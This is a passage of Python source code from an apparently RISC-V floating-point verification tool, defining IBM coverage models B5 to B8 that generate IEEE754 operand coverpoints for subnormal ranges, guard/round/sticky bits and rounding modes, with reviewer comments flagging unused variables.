            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards
        # (b4_comb uses rs1/rs2/rs3 directly) — confirm leftover.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    # One coverpoint per operand combination per rounding mode (0..4).
    for c in b4_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B4 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b5(flen, opcode, ops, seed=-1):
    '''
    IBM Model B5 Definition:
        This model creates a test-case for each of the following constraints on the intermediate results:

        1. All the numbers in the range [+MinSubNorm - 3 ulp, +MinSubNorm + 3 ulp]
        2. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
        3. All the numbers in the range [MinNorm - 3 ulp, MinNorm + 3 ulp]
        4. All the numbers in the range [-MinNorm - 3 ulp, -MinNorm + 3 ulp]
        5. A random number in the range (0, MinSubNorm)
        6. A random number in the range (-MinSubNorm, -0)
        7. One number for every exponent in the range [MinNorm.exp, MinNorm.exp + 5]

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Results = [+MinSubNorm - 3 ulp, +MinSubNorm + 3 ulp], [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp] , [MinNorm - 3 ulp, MinNorm + 3 ulp] , [-MinNorm - 3 ulp, -MinNorm + 3 ulp] , Random Num in (0, MinSubNorm), Random Num in (-MinSubNorm, -0), One Num for every exp in [MinNorm.exp, MinNorm.exp + 5]]

        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        ir_dataset = []
        # +MinSubNorm neighborhood: str(i) appends extra mantissa digits whose
        # bits encode the guard/round/sticky (GRS) combination under test.
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
        ieee754_minnorm = '0x1.000000p-126'
        # +MinNorm neighborhood, same GRS sweep as above.
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
        # One value for each exponent in [MinNorm.exp, MinNorm.exp + 5].
        minnorm_Exp = ['0x1.000000p-126','0x1.000000p-125','0x1.000000p-124','0x1.000000p-123','0x1.000000p-122','0x1.000000p-121']
        for i in minnorm_Exp:
            ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(126+int(i.split('p')[1]))])
        # Convert hex strings to floats and mirror with negated values so the
        # negative ranges of the model are covered too.
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
            ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
    elif flen == 64:
        # NOTE(review): maxdec is assigned but never used in this branch.
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubdec = '5e-324'
        ir_dataset = []
        # Double-precision values are kept as decimal strings and perturbed via
        # Decimal arithmetic (they can exceed what a Python float represents).
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
        minnormdec = '2.2250738585072014e-308'
        ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
        ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
        minnorm_Exp = ['4.450147717014403e-308','8.900295434028806e-308','1.780059086805761e-307','3.560118173611522e-307','7.120236347223044e-307']
        k = 1
        for i in minnorm_Exp:
            ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(k)])
            k += 1
        # Mirror with '-'-prefixed decimal strings for the negative ranges.
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
    # Deterministic per-opcode default seeds keep generation reproducible and
    # distinct between instructions sharing this model.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    # For each target intermediate result, draw random rs1 (and rs3 for fused
    # ops) and back-solve rs2 so that rs1 {op} rs2 lands on the target value.
    b5_comb = []
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        # Record the operand tuple in IEEE754 hex; arity depends on the opcode.
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b5_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    # Emit one coverpoint per operand tuple per rounding mode (rm 0-4); the
    # text after ' # ' is a human-readable annotation handled by comments_parser.
    coverpoints = []
    k = 0
    for c in b5_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B5 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b6(flen, opcode, ops, seed=-1):
    '''
    IBM Model B6 Definition:
        This model tests intermediate results in the space between -MinSubNorm and
        +MinSubNorm. For each of the following ranges, we select 8 random test cases,
        one for every combination of the LSB, guard bit, and sticky bit.

        1. -MinSubNorm < intermediate < -MinSubNorm / 2
        2. -MinSubNorm / 2 <= intermediate < 0
        3. 0 < intermediate <= +MinSubNorm / 2
        4. +MinSubNorm / 2 < intermediate < +MinSubNorm

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Results = [Random number ∈ (-MinSubNorm, -MinSubNorm/2), Random number ∈ (-MinSubNorm/2, 0), Random number ∈ (0, +MinSubNorm/2), Random number ∈ (+MinSubNorm/2, +MinSubNorm)]
        {All 8 combinations of guard, round and sticky bit are tested for every number}

        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    # Deterministic per-opcode default seeds keep generation reproducible.
    # Only opcodes whose intermediate result can fall inside (-MinSubNorm,
    # +MinSubNorm) are seeded here (no fadd/fsub/fsqrt in this model).
    if seed == -1:
        if opcode in 'fmul':
            random.seed(0)
        elif opcode in 'fdiv':
            random.seed(1)
        elif opcode in 'fmadd':
            random.seed(2)
        elif opcode in 'fnmadd':
            random.seed(3)
        elif opcode in 'fmsub':
            random.seed(4)
        elif opcode in 'fnmsub':
            random.seed(5)
    else:
        random.seed(seed)
    if flen == 32:
        ir_dataset = []
        ieee754_minsubnorm_n = '-0x0.000001p-127'
        minnum = float.fromhex(ieee754_minsubnorm_n)
        # One random base value per quarter-range; each is then perturbed with
        # a Decimal offset per guard/round/sticky (GRS) combination.
        r=str(random.uniform(minnum,minnum/2))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
        r=str(random.uniform(minnum/2,0))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
        r=str(random.uniform(0,abs(minnum/2)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
        r=str(random.uniform(abs(minnum/2),abs(minnum)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
    elif flen == 64:
        ir_dataset = []
        ieee754_minsubnorm_n = '-0x0.0000000000001p-1022'
        minnum = float.fromhex(ieee754_minsubnorm_n)
        # NOTE(review): unlike the flen==32 branch, the exponent part of r
        # ('e'+r.split('e')[1]) is not re-appended to the stored value here,
        # so only the mantissa digits of the random draw survive -- confirm
        # this is intentional.
        r=str("{:.2e}".format(random.uniform(minnum,minnum/2)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
        r=str("{:.2e}".format(random.uniform(minnum/2,0)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
        r=str("{:.2e}".format(random.uniform(0,abs(minnum/2))))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
        r=str("{:.2e}".format(random.uniform(abs(minnum/2),abs(minnum))))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
    # Back-solve rs2 (via Decimal) so rs1 {op} rs2 hits each target IR; rs1/rs3
    # are drawn tiny so the products/quotients stay in the subnormal space.
    b6_comb = []
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(0,1e-30)
        rs3 = random.uniform(0,1e-30)
        if opcode in 'fmul':
            rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        # Record the operand tuple in IEEE754 hex; arity depends on the opcode.
        if opcode in ['fmul','fdiv']:
            b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    #print(*b6_comb,sep='\n')
    # Emit one coverpoint per operand tuple per rounding mode (rm 0-4).
    coverpoints = []
    k=0
    for c in b6_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B6 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b7(flen, opcode, ops, seed=-1):
    '''
    IBM Model B7 Definition:
        This model checks that the sticky bit is calculated correctly in each of the following cases (for every possible combination in the table). The Guard bit should always be 0, and the sign positive, so that miscalculation of the sticky bit will alter the final result.

        Mask on Extra bits

        .. code-block::

            1000...000
            0100...000
            …
            0000...010
            0000...001
            0000000000

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Results = [ieee754_maxnorm, maxnum, maxdec, maxnum]
        {It assures the calculation of sticky bit for every possible combination in the table}

        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The Sticky bit is calculated in each case. The guard bit here is always assumed to be zero and the sign is positive, so that miscalculation of the sticky bit will alter the final result.
        - In the intermediate result dataset, the elements are appended as elements before the character 'p' and then the binary equivalent of '010' + pow(2,i).
        - Finally on the extra bits, it is masked with the comment created in the previous point. All the first character of each element is converted to its floating point equivalent in a loop
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with a single fixed rounding mode for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 60
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        # Base numbers: the positive values from the module-level single-precision
        # subnormal/normal field datasets, converted to hex-float strings.
        ieee754_num = []
        for i in fsubnorm+fnorm:
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
        # For each base number, append extra mantissa digits that place a single
        # set bit at every extra-bit position (the mask in the comment string),
        # with guard bits fixed to '010'.
        ir_dataset = []
        for k in range(len(ieee754_num)):
            for i in range(0,20):
                comment = (20-i)*'0' + '1' + i*'0'
                ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+'{:021b}'.format(pow(2,i)),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Mask on extra bits ---> ' + comment])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        # NOTE(review): maxdec is assigned but never used in this branch.
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        # Base numbers: positive values from the double-precision datasets,
        # kept as decimal strings (Decimal arithmetic below).
        ieee754_num = []
        for i in dsubnorm+dnorm:
            float_val = fields_dec_converter(64,i)
            if float_val > 0:
                ieee754_num.append(str(float_val))
        # Single set bit walked across the 52 extra-bit positions via nested
        # (k, i) loops; the position is k*(i+1) in the comment mask.
        ir_dataset = []
        for l in range(len(ieee754_num)):
            for k in range(1,13):
                for i in range(4):
                    comment = (k*(i+1))*'0' + '1' + (51-(k*(i+1)))*'0'
                    ir_dataset.append([str(Decimal(ieee754_num[l].split('e')[0])+Decimal(pow(16,-14))+Decimal(pow(pow(2,3-i)*16,-14-k)))+'e'+ieee754_num[l].split('e')[1],' | Mask on extra bits ---> ' + comment])
    # Deterministic per-opcode default seeds keep generation reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    # Draw random rs1 (and rs3) and back-solve rs2 so rs1 {op} rs2 hits each IR.
    b7_comb = []
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        # Record the operand tuple in IEEE754 hex; arity depends on the opcode.
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b7_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    # Unlike the other models, B7 emits a single coverpoint per operand tuple
    # with the rounding mode fixed at rm_val == 3 (no sweep over modes).
    coverpoints = []
    k = 0
    for c in b7_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 3'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B7 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b8(flen, opcode, ops, seed=-1):
    '''
    IBM Model B8 Definition:
        This model targets numbers that are on the edge of a rounding boundary. These boundaries may vary depending on the rounding mode. These numbers include floating-point numbers and midpoints between floating-point numbers. In order to target the vicinity of these numbers, we test the following constraints on the extra bits of the intermediate result:

        1. All values of extra-bits in the range [000...00001, 000...00011]
        2. All values of extra-bits in the range [111...11100, 111...11111]

        For each value selected above, test all the combinations on the LSB of the significand, the guard bit, and the sticky bit (if the number of extra bits is not finite).

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Results = [For every Subnormal and Normal number, 8 combinations of guard, round and sticky bit are appended, along with 6 combinations(3 positive, 3 negative) of the mask on extra bits]

        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above. The coverpoints can be increased by increasing the dataset of normal and subnormal numbers.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 60
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        # Base numbers: positive values from the single-precision subnormal /
        # normal field datasets, as hex-float strings.
        ieee754_num = []
        for i in fsubnorm+fnorm:
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # print(*ieee754_num, sep = '\n')
        # For each base number: extra-bit masks 00...001..011 (all-zeros run)
        # and 11...100..111 (all-ones run), each under every non-zero GRS
